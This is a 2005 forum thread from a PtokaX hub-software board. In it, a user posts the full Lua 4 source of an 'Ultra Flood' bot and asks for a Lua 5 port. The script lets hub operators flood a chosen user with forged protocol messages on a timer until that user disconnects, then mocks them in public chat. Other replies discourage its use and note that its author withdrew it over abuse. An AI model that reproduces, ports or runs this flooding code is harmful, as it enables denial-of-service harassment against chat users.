Ultra Flood
 

News:

29 December 2022 - PtokaX 0.5.3.0 (20th anniversary edition) released...
11 April 2017 - PtokaX 0.5.2.2 released...
8 April 2015 Anti child and anti pedo pr0n scripts are not allowed anymore on this board!
28 September 2015 - PtokaX 0.5.2.1 for Windows 10 IoT released...
3 September 2015 - PtokaX 0.5.2.1 released...
16 August 2015 - PtokaX 0.5.2.0 released...
1 August 2015 - Crowdfunding for ADC protocol support in PtokaX ended. Clearly nobody want ADC support...
30 June 2015 - PtokaX 0.5.1.0 released...
30 April 2015 Crowdfunding for ADC protocol support in PtokaX
26 April 2015 New support hub!
20 February 2015 - PtokaX 0.5.0.3 released...
13 April 2014 - PtokaX 0.5.0.2 released...
23 March 2014 - PtokaX testing version 0.5.0.1 build 454 is available.
04 March 2014 - PtokaX.org sites were temporary down because of DDOS attacks and issues with hosting service provider.

Main Menu

Ultra Flood

Started by Baad-Boi, 04 August, 2005, 23:45:22

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Baad-Boi

hey i got a ultra flood script and its in lua 4

iz der any one who can convert it into lua 5
--------------------------------------------------------------------



sBotName = "UltraFlood";

sFloodUser = nil;
iFloodCount = 0;

sToFloodUser = nil;

function Main()
   frmHub:RegBot(sBotName);
   SetTimer(10);
end

function OpConnected(curUser)
curUser:SendData("$UserCommand 1 3 ?l?r??l??? $<%[mynick]> !ultra %[nick]||")
end

function OnTimer()
   for i = 1, 20, 1 do
      iFloodCount = iFloodCount + 1;
      SendToNick(sFloodUser, "$Hello Flooder"..iFloodCount..sToFloodUser..iFloodCount.." $ ")
   end

   if(GetItemByName(sFloodUser) == nil) then
      StopTimer();
      SendToAll(sBotName, sFloodUser.." was MuRkEdd wiTh "..iFloodCount.." anD wEnT DoWn In a BiG BaLL oF FlAmEz!!");
      iFloodCount = 0;
      sFloodUser,sToFloodUser = nil,nil;
   end
end

function DataArrival(curUser, sData)
   local s, e, cmd, user = strfind(sData, "%b<>%s+(%S+)%s+(%S+)%|$");

   if(cmd == nil or curUser.bOperator == nil) then return 0; end

   cmd = strlower(cmd);

   if(cmd == "!ultra" and GetItemByName(user).bOperator ~= 1) then
      sFloodUser = user;
      sToFloodUser = "|$To: "..sFloodUser.." From: Flooder";
      SendToAll(sBotName, "MuRdErInG"..user.." tiLl sOmE mAnNaZ AnD ReSpEcT cOmEz OuT ThEr aSS!!");
      StartTimer();
   return 1
   end
end



----------------------------------------------------------------------

?Tr??T_????

i wish i know o translate it.. :(

bastya_elvtars

This script relies on deprecated parts of the DC protocol, and it is a bad way of punishment anyway, better not use it, simply kick...
Everything could have been anything else and it would have just as much meaning.

??????Hawk??????

flooding is  bad...

you flood a user ,  they flood or mess with your hub  ..  who looses the most ????


??????Hawk??????

Pothead

Said many times before. Phatty made this script.  Then he deleted it.  Because of it being abused.  You should respect his descision. :)

SMF spam blocked by CleanTalk